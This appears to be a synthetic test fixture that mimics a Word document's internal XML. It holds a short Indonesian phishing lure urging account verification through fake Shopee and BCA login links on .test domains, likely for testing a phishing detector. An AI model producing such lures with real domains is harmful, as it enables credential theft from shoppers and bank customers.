
<file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
<document>
            Silakan verify account melalui http://shopee-login-update.test
        </document>
</file>

<file path=word/_rels/document.xml.rels>
        <Relationships>
            <Relationship Target="http://bca-login-update.test"/>
        </Relationships>
        
</file>